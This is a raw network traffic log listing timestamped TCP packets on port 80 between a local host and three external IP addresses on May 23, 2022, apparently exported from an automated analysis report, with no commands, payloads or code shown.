                              May 23, 2022 09:10:57.354079962 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.354089022 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.354095936 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.354104042 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.354110003 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.354113102 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.354115963 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.354127884 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.354146004 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.370037079 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382488012 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382514954 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382530928 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382546902 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382570982 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382589102 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382603884 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382621050 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382625103 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382636070 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382653952 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382658005 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382664919 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382671118 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382683039 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382688046 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382688046 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382699966 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382704973 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382710934 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382715940 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382720947 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382723093 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382741928 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382744074 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382759094 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382776022 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382781029 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382783890 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382790089 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382797956 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382814884 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382831097 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382833958 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382841110 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382844925 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382848978 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382865906 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382882118 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382889986 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382898092 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382900953 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382908106 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382915974 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382927895 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382935047 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382951021 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382966995 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382971048 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382977962 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382982016 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382982969 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.382986069 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.382999897 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.383018017 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.383028984 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.383042097 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.383042097 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.383050919 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.383057117 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.383059025 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.383130074 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.383138895 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.383300066 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.383807898 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.384612083 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.398621082 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.398649931 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.398673058 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.398695946 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.398719072 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.398744106 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.398785114 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.398833990 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.398840904 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.398845911 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.398849964 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.411448002 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.411484957 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.411506891 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.411530972 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.411554098 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.411576986 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.411598921 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.411619902 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.411642075 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.411685944 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.411686897 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.411706924 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.411736965 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.411758900 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.411783934 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.411858082 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.411866903 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.411871910 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.411876917 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.411880970 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.411885023 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.411890030 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.411894083 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.411897898 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.411984921 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.411992073 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.412007093 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.412028074 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.412053108 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.412076950 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.412077904 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.412106991 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.412117958 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.412811995 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.412817955 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.412836075 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.412857056 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.412872076 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.412879944 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.412902117 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.412902117 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.412913084 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.412925005 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.412945986 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.412967920 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.412987947 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.413012028 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.413032055 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.413053989 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.413068056 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.413078070 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.413078070 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.413084030 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.413088083 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.413091898 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.413096905 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.413099051 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.413101912 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.413120031 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.413120985 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.413131952 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.413141966 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.413161993 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.413182974 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.413187027 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.413197041 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.413203955 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.413203955 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.413224936 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.413233995 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.413247108 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.413253069 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.413266897 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.413273096 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.413288116 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.413299084 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.413311958 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.413316965 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.413327932 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.413355112 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.413733959 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.415410995 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.427275896 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.427323103 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.427357912 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.427371025 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.427386045 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.427395105 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.427401066 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.427417040 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.440340042 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.440413952 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.440453053 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.440526009 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.440531969 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.440560102 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.440567017 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.440568924 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.440607071 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.440619946 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.440648079 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.440658092 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.440689087 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.440692902 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.440727949 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.440740108 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.440778017 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.441386938 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.441924095 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.441965103 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.441988945 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.442004919 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.442012072 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.442044020 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.442051888 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.442086935 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.442090034 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.442127943 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.442133904 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.442173004 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.443641901 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.443684101 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.443726063 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.443744898 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.443753004 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.443785906 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.443793058 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.443825960 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.443834066 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.443867922 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.443881035 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.443908930 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.443922043 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.443948984 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.443955898 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.443989038 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.443995953 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444015980 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.444036961 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444056034 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.444056988 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444096088 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.444103956 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444137096 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.444144011 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444179058 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.444189072 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444216967 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.444228888 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444257975 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.444272041 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444298029 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.444309950 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444329023 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444336891 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.444339037 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444376945 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.444381952 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444416046 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.444420099 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444456100 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.444459915 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444500923 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444524050 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.444566011 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.444587946 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444603920 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.444617033 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444623947 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444644928 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.444644928 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444684029 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.444685936 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444722891 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.444731951 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444765091 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.444780111 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.444819927 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.445307016 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.445610046 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.455667973 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.455715895 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.455753088 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.455756903 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.455773115 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.455791950 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.455796957 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.455831051 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.455845118 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.455868959 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.455878973 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.455895901 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.455924034 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.455952883 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.469197989 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.469258070 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.469299078 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.469321012 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.469341040 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.469341040 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.469366074 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.469381094 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.469386101 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.469419003 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.469436884 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.469475031 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.470334053 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.470377922 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.470417976 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.470417976 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.470433950 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.470457077 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.470478058 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.470498085 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.470514059 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.470535040 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.470551014 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.470592022 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.473020077 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.473066092 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.473109007 CEST804917485.114.142.153192.168.2.22
                              May 23, 2022 09:10:57.473114967 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.473140955 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:10:57.473157883 CEST4917480192.168.2.2285.114.142.153
                              May 23, 2022 09:11:00.056556940 CEST8049173103.171.181.223192.168.2.22
                              May 23, 2022 09:11:00.056725025 CEST4917380192.168.2.22103.171.181.223
                              May 23, 2022 09:11:01.448847055 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.573765993 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.573941946 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.574974060 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.699779034 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.798887968 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.798969030 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.798998117 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.799025059 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.799052000 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.799062967 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.799078941 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.799082994 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.799086094 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.799101114 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.799108028 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.799127102 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.799134016 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.799149990 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.799160004 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.799182892 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.799185991 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.799204111 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.799237967 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.829891920 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.923927069 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.923986912 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.924026966 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.924062967 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.924096107 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.924099922 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.924118042 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.924120903 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.924134016 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.924137115 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.924170017 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.924175024 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.924206972 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.924211979 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.924243927 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.924247980 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.924280882 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.924283981 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.924323082 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.924324036 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.924360991 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.924361944 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.924398899 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.924398899 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.924434900 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.924438000 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.924468994 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.924495935 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.924540043 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.924551010 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.924571037 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.924576044 CEST4917580192.168.2.2266.71.247.68
